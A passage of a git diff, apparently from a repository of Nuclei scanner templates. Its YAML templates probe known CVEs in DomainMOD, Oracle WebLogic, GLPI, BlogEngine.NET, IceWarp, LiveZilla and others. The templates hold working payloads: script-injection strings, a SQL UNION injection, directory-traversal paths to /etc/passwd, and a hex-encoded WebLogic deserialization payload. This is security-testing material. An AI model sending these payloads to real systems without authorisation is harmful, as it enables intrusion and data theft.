HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/dw/add-server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= + - | + GET /admin/dw/servers.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19914.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-19915.yaml b/nuclei-templates/CVE-2018/cve-2018-19915.yaml deleted file mode 100644 index f397373f28..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19915.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-19915 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through 4.11.01 has XSS via the assets/edit/host.php Web Host Name or Web Host URL field. - reference: - - https://github.com/domainmod/domainmod/issues/87 - - https://www.exploit-db.com/exploits/46376/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19915 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/host.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test - - | - GET /assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-20009.yaml b/nuclei-templates/CVE-2018/cve-2018-20009.yaml new file mode 100644 index 0000000000..e6a0801a38 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20009.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20009 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider.php ssl-provider-name, ssl-provider's-url parameters. + reference: + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + - https://www.exploit-db.com/exploits/46372/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20009 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= + - | + GET /assets/ssl-providers.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml deleted file mode 100644 index ca5de31180..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-20010.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-2628.yaml b/nuclei-templates/CVE-2018/cve-2018-2628.yaml new file mode 100644 index 0000000000..86e858609d --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-2628.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-2628 + +info: + name: Oracle WebLogic Server Deserialization RCE + author: milo2012 + severity: critical + reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 + tags: cve,cve2018,oracle,weblogic,network + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2628 + cwe-id: CWE-502 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." + +network: + - inputs: + - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}" + read: 1024 + - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}" + read: 1024 + - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" + read: 1024 + host: + - "{{Hostname}}" + read-size: 1024 + matchers: + - type: regex + regex: + - "\\$Proxy[0-9]+" diff --git a/nuclei-templates/CVE-2018/CVE-2018-6008.yaml b/nuclei-templates/CVE-2018/cve-2018-6008.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-6008.yaml rename to nuclei-templates/CVE-2018/cve-2018-6008.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-6200.yaml b/nuclei-templates/CVE-2018/cve-2018-6200.yaml deleted file mode 100644 index 3ef39cbffe..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-6200.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-6200 - -info: - name: vBulletin 3.x.x & 4.2.x - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - vBulletin 3.x.x and 4.2.x through 4.2.5 has an open redirect via the redirector.php url parameter. - reference: - - https://cxsecurity.com/issue/WLB-2018010251 - - https://www.cvedetails.com/cve/CVE-2018-6200 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-6200 - cwe-id: CWE-601 - metadata: - verified: true - tags: cve,cve2018,redirect,vbulletin - -requests: - - method: GET - path: - - '{{BaseURL}}/redirector.php?url=https://interact.sh' - - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh' - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '' - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-6910.yaml b/nuclei-templates/CVE-2018/cve-2018-6910.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-6910.yaml rename to nuclei-templates/CVE-2018/cve-2018-6910.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7719.yaml b/nuclei-templates/CVE-2018/cve-2018-7719.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7719.yaml rename to nuclei-templates/CVE-2018/cve-2018-7719.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8033.yaml b/nuclei-templates/CVE-2018/cve-2018-8033.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8033.yaml rename to nuclei-templates/CVE-2018/cve-2018-8033.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-8715.yaml b/nuclei-templates/CVE-2018/cve-2018-8715.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8715.yaml rename to nuclei-templates/CVE-2018/cve-2018-8715.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9161.yaml rename to nuclei-templates/CVE-2018/cve-2018-9161.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-9205.yaml b/nuclei-templates/CVE-2018/cve-2018-9205.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9205.yaml rename to nuclei-templates/CVE-2018/cve-2018-9205.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml deleted file mode 100644 index 780f70d9a0..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-0230.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-0230 - -info: - name: Apache Struts RCE - author: geeknik - description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-059 - - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability - severity: critical - tags: struts,rce,cve,cve2019,apache - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-0230 - cwe-id: CWE-915 - -requests: - - method: GET - path: - - "{{BaseURL}}/?id=nuclei%25{128*128}" - - matchers: - - type: word - words: - - "nuclei16384" diff --git a/nuclei-templates/CVE-2019/CVE-2019-10232.yaml b/nuclei-templates/CVE-2019/CVE-2019-10232.yaml new file mode 100644 index 0000000000..796e20b3de --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-10232.yaml @@ -0,0 +1,37 @@ +id: CVE-2019-10232 + +info: + name: Pre-authenticated SQL injection in GLPI <= 9.3.3 + author: RedTeamBrasil + severity: critical + description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication. + reference: + - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf + - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c + tags: cve,cve2019,glpi,sqli,injection + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10232 + cwe-id: CWE-89 + +requests: + - method: GET + path: + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "-MariaDB-" + - "Start unlock script" + condition: and + + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/nuclei-templates/CVE-2019/CVE-2019-10717.yaml b/nuclei-templates/CVE-2019/CVE-2019-10717.yaml new file mode 100644 index 0000000000..a69c522e03 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-10717.yaml @@ -0,0 +1,54 @@ +id: CVE-2019-10717 + +info: + name: BlogEngine.NET 3.3.7.0 - Local File Inclusion + author: arafatansari + severity: high + description: | + BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. + remediation: | + Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. + reference: + - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect + - https://github.com/rxtur/BlogEngine.NET/commits/master + - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 + - http://seclists.org/fulldisclosure/2019/Jun/44 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N + cvss-score: 7.1 + cve-id: CVE-2019-10717 + cwe-id: CWE-22 + epss-score: 0.00409 + epss-percentile: 0.712 + cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dotnetblogengine + product: blogengine.net + shodan-query: http.html:"Blogengine.net" + tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine + +http: + - method: GET + path: + - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + + - type: regex + regex: + - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e9835e960c185d264844ff6a1c0dcc4461f0848d00e894bb0681a656b4939db90220223530414a1d116e03bae637ebc7a0b6037ac08c0f2daee019cd5fc664d2e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml deleted file mode 100644 index 0d2b1b1d75..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2019-11370 - -info: - name: Carel pCOWeb \">') - condition: and -# digest: 4a0a0047304502206211cfa838795769776a00d7ccfcedaa1fe50255fc01e8f945c461b0d2ebc946022100f37746cb8f51e8f7d78c8730d26614a8b2ffc9a7d999c013d5b875cf3568d608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-12314.yaml b/nuclei-templates/CVE-2019/CVE-2019-12314.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12314.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12314.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml b/nuclei-templates/CVE-2019/CVE-2019-12581.yaml deleted file mode 100644 index 327f88b08f..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2019-12581 - -info: - name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting - author: n-thumann - severity: medium - description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. - reference: - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 - - https://www.zyxel.com/us/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12581 - cwe-id: CWE-79 - epss-score: 0.00642 - epss-percentile: 0.7705 - cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: zyxel - product: uag2100_firmware - shodan-query: http.title:"ZyWall" - tags: cve,cve2019,zyxel,zywall,xss - -http: - - method: GET - path: - - "{{BaseURL}}/free_time_failed.cgi?err_msg=" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Please contact with administrator." - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 490a0046304402202bbcd24325d27b4afa9692a47676116c3e746dac9efb6781eca7200bedd46d5c02203e77b6aa27e9da81a381ac8a93047e7dfe379956ebf9a6b0196e58a7150cb1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-12593.yaml b/nuclei-templates/CVE-2019/CVE-2019-12593.yaml new file mode 100644 index 0000000000..0fd429f06a --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-12593.yaml @@ -0,0 +1,36 @@ +id: CVE-2019-12593 + +info: + name: IceWarp <=10.4.4 - Local File Inclusion + author: pikpikcu + severity: high + description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. + tags: cve,cve2019,lfi,icewarp + reference: + - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt + - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 + - http://www.icewarp.com # vendor homepage + - https://www.icewarp.com/downloads/trial/ # software link + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12593 + cwe-id: CWE-22 + metadata: + google-dork: Powered By IceWarp 10.4.4 + +requests: + - method: GET + path: + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini' + - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[intl]" + - "root:x:0" diff --git a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml new file mode 100644 index 0000000000..32221d9467 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml @@ -0,0 +1,56 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/49669 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + epss-score: 0.17333 + epss-percentile: 0.95984 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: livezilla + product: livezilla + shodan-query: http.html:LiveZilla + tags: cve,cve2019,xss,edb,packetstorm,livezilla + +http: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-13101.yaml b/nuclei-templates/CVE-2019/CVE-2019-13101.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-13101.yaml rename to nuclei-templates/CVE-2019/CVE-2019-13101.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-13573.yaml b/nuclei-templates/CVE-2019/CVE-2019-13573.yaml deleted file mode 100644 index b7fc3f272f..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-13573.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2019-13573 - -info: - name: > - FV Flowplayer Video Player <= 7.3.18.727 - SQL Injection - author: topscoder - severity: critical - description: > - A SQL injection vulnerability exists in the FolioVision FV Flowplayer Video Player plugin before 7.3.19.727 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/232dd4fa-748e-4b65-8b78-7b2d8e9831aa?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-13573 - metadata: - fofa-query: "wp-content/plugins/fv-wordpress-flowplayer/" - google-query: inurl:"/wp-content/plugins/fv-wordpress-flowplayer/" - shodan-query: 'vuln:CVE-2019-13573' - tags: cve,wordpress,wp-plugin,fv-wordpress-flowplayer,critical - -http: - - method: GET - redirects: true - max-redirects: 3 - path: - - "{{BaseURL}}/wp-content/plugins/fv-wordpress-flowplayer/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - 